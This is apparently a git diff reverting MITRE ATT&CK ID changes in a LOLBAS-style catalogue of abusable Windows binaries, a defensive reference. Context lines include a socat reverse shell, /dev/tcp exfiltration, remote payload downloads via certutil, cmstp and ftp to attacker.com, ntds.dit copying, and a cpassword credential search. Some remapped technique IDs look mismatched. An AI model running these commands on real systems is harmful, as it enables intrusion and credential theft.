Revert "MITRE ATT&CK realignment sprint"

Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
 - Path: C:\OEM\Preload\utility

Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Whatsapp installed
 Full_Path:
   - Path: '%localappdata%\Whatsapp\Update.exe'

Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Archive-Old-Version/LOLUtilz/OtherScripts/Testxlst.yml

@@ -9,12 +9,14 @@ Commands:
     Category: Execution
     Privileges: User
     MitreID: T1064
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1064
     OperatingSystem: Windows
   - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
     Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
     Category: Execution
     Privileges: User
     MitreID: T1064
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1064
     OperatingSystem: Windows
 Full_Path:
   - c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)

YML-Template.yml

@@ -1,8 +1,8 @@
 ---
 Name: Binary.exe
 Description: Something general about the binary
-Author: The name of the person that created this file
+Author: The person that created this file
-Created: YYYY-MM-DD (date the person created this file)
+Created: Date the person created this file
 Commands:
   - Command: The command
     Description: Description of the command
@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: Required privs
     MitreID: T1055
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1055
     OperatingSystem: Windows 10 1803, Windows 10 1703
   - Command: The second command
     Description: Description of the second command
@@ -17,6 +18,7 @@ Commands:
     Category: AWL Bypass
     Privileges: Required privs
     MitreID: T1033
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1033
     OperatingSystem: Windows 10 All
 Full_Path:
   - Path: c:\windows\system32\bin.exe

yml/OSBinaries/AppInstaller.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe

yml/OSBinaries/Aspnet_Compiler.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1127
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

yml/OSBinaries/At.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
     Category: Execute
     Privileges: Local Admin
-    MitreID: T1053.002
+    MitreID: T1053
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1053
     OperatingSystem: Windows 7 or older
 Full_Path:
   - Path: C:\WINDOWS\System32\At.exe

yml/OSBinaries/Atbroker.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Atbroker.exe

yml/OSBinaries/Bash.yml

@@ -9,28 +9,32 @@ Commands:
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
   - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
     Description: Executes a reverseshell
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
   - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
     Description: Exfiltrate data
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
   - Command: bash.exe -c calc.exe
     Description: Executes calc.exe from bash.exe
     Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\bash.exe

yml/OSBinaries/Bitsadmin.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
     Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
@@ -17,6 +18,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
     Description: Command for copying cmd.exe to another folder
@@ -24,6 +26,7 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
     Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
@@ -31,6 +34,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\bitsadmin.exe

yml/OSBinaries/Certoc.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows Server 2022
   - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
     Description: Downloads text formatted files
@@ -17,6 +18,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows Server 2022  
 Full_Path:
   - Path: c:\windows\system32\certoc.exe

yml/OSBinaries/Certreq.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
     Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
@@ -17,6 +18,7 @@ Commands:
     Category: Upload
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\certreq.exe

yml/OSBinaries/Certutil.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
     Description: Download and save 7zip to disk in the current folder.
@@ -17,13 +18,15 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
     Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
     Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/techniques/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: certutil -encode inputFileName encodedOutputFileName
     Description: Command to encode a file using Base64
@@ -31,6 +34,7 @@ Commands:
     Category: Encode
     Privileges: User
     MitreID: T1027
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1027
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: certutil -decode encodedInputFileName decodedOutputFileName
     Description: Command to decode a Base64 encoded file.
@@ -38,6 +42,7 @@ Commands:
     Category: Decode
     Privileges: User
     MitreID: T1140
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1140
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: certutil --decodehex encoded_hexadecimal_InputFileName
     Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
@@ -45,6 +50,7 @@ Commands:
     Category: Decode
     Privileges: User
     MitreID: T1140
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1140
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\certutil.exe

yml/OSBinaries/Cmd.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
-    MitreID: T1059.003
+    MitreID: T1170
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: cmd.exe - < fakefile.doc:payload.bat
     Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
-    MitreID: T1059.003
+    MitreID: T1170
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cmd.exe

yml/OSBinaries/Cmdkey.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Credentials
     Privileges: User
     MitreID: T1078
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1078
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cmdkey.exe

yml/OSBinaries/Cmdl32.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cmdl32.exe

yml/OSBinaries/Cmstp.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
     Category: Execute
     Privileges: User
-    MitreID: T1218.003
+    MitreID: T1191
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1191
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
     Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
     Category: AwL bypass
     Privileges: User
-    MitreID: T1218.003
+    MitreID: T1191
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1191
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cmstp.exe

yml/OSBinaries/ConfigSecurityPolicy.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Upload
     Privileges: User
     MitreID: T1567
+    MitreLink: https://attack.mitre.org/techniques/T1567/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

yml/OSBinaries/Control.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
-    MitreID: T1218.002
+    MitreID: T1196
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1196
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\control.exe

yml/OSBinaries/Csc.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: csc -target:library File.cs
     Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
@@ -17,6 +18,7 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe

yml/OSBinaries/Cscript.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cscript.exe

yml/OSBinaries/DataSvcUtil.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Upload
     Privileges: User
     MitreID: T1567
+    MitreLink: https://attack.mitre.org/techniques/T1567/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe

yml/OSBinaries/Desktopimgdownldr.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\windows\system32\desktopimgdownldr.exe

yml/OSBinaries/Dfsvc.yml

@@ -10,6 +10,7 @@ Commands:
     Category: AWL bypass
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe

yml/OSBinaries/Diantz.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Hide data compressed into an Alternate Data Stream.
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
   - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
     Description: Download and compress a remote file and store it in a cab file on local machine.
@@ -17,6 +18,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
 Full_Path:
   - Path: c:\windows\system32\diantz.exe

yml/OSBinaries/Diskshadow.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit
     Category: Dump
     Privileges: User
-    MitreID: T1003.003
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows server
   - Command: diskshadow> exec calc.exe
     Description: Execute commands using diskshadow.exe to spawn child process
     Usecase: Use diskshadow to bypass defensive counter measures
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1003
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows server
 Full_Path:
   - Path: C:\Windows\System32\diskshadow.exe

yml/OSBinaries/Dllhost.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1546.015
+    MitreLink: https://attack.mitre.org/techniques/T1546/015/
     OperatingSystem: Windows 10 (and likely previous versions)
 Full_Path:
   - Path: C:\Windows\System32\dllhost.exe

yml/OSBinaries/Dnscmd.yml

@@ -6,10 +6,11 @@ Created: 2018-05-25
 Commands:
   - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
     Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
-    Usecase: Remotely inject dll to dns server
+    Usecase: Remotly inject dll to dns server
     Category: Execute
     Privileges: DNS admin
-    MitreID: T1543.003
+    MitreID: T1035
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1035
     OperatingSystem: Windows server
 Full_Path:
   - Path: C:\Windows\System32\Dnscmd.exe

yml/OSBinaries/Esentutl.yml

@@ -10,41 +10,47 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
     Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
     Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
     Usecase: Extract hidden file within alternate data streams
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
     Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
     Description: Copies the source EXE to the destination EXE file
     Usecase: Use to copy files from one unc path to another
     Category: Download
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
     Description: Copies a (locked) file using Volume Shadow Copy
     Usecase: Copy/extract a locked file such as the AD Database
     Category: Copy
     Privileges: Admin
-    MitreID: T1003.003
+    MitreID: T1003
+    MitreLink: https://attack.mitre.org/techniques/T1003/
     OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server
 Full_Path:
   - Path: C:\Windows\System32\esentutl.exe

yml/OSBinaries/Eventvwr.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
     Category: UAC bypass
     Privileges: User
-    MitreID: T1548.002
+    MitreID: T1088
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1088
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\eventvwr.exe

yml/OSBinaries/Expand.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
     Description: Copies source file to destination.
@@ -17,13 +18,15 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
     Description: Copies source file to destination Alternate Data Stream (ADS)
     Usecase: Copies files from A to B
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Expand.exe

yml/OSBinaries/Explorer.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: explorer.exe C:\Windows\System32\notepad.exe
     Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
     Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 (Tested)
 Full_Path:
   - Path: C:\Windows\explorer.exe

yml/OSBinaries/Extexport.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Program Files\Internet Explorer\Extexport.exe

yml/OSBinaries/Extrac32.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Extract data from cab file and hide it in an alternate data stream.
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
     Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
     Usecase: Extract data from cab file and hide it in an alternate data stream.
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
     Description: Copy the source file to the destination file and overwrite it.
@@ -24,6 +26,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
     Description: Command for copying calc.exe to another folder
@@ -31,6 +34,7 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\extrac32.exe

yml/OSBinaries/Findstr.yml

@@ -9,21 +9,24 @@ Commands:
     Usecase: Add a file to an alternate data stream to hide from defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
     Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: findstr /S /I cpassword \\sysvol\policies\*.xml
     Description: Search for stored password in Group Policy files stored on SYSVOL.
     Usecase: Find credentials stored in cpassword attrbute
     Category: Credentials
     Privileges: User
-    MitreID: T1552.001
+    MitreID: T1081
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1081
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.
@@ -31,6 +34,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1185
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1185
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\findstr.exe

yml/OSBinaries/Finger.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105
     OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
 Full_Path:
   - Path: c:\windows\system32\finger.exe

yml/OSBinaries/FltMC.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Defense evasion
     Category: ADS 
     Privileges: Admin
-    MitreID: T1562.001
+    MitreID: T1562
+    MitreLink: https://attack.mitre.org/techniques/T1562/002/
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\fltMC.exe

yml/OSBinaries/Forfiles.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Use forfiles to start a new process to evade defensive counter measures
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
     Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
     Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\forfiles.exe

yml/OSBinaries/Ftp.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
     Description: Download
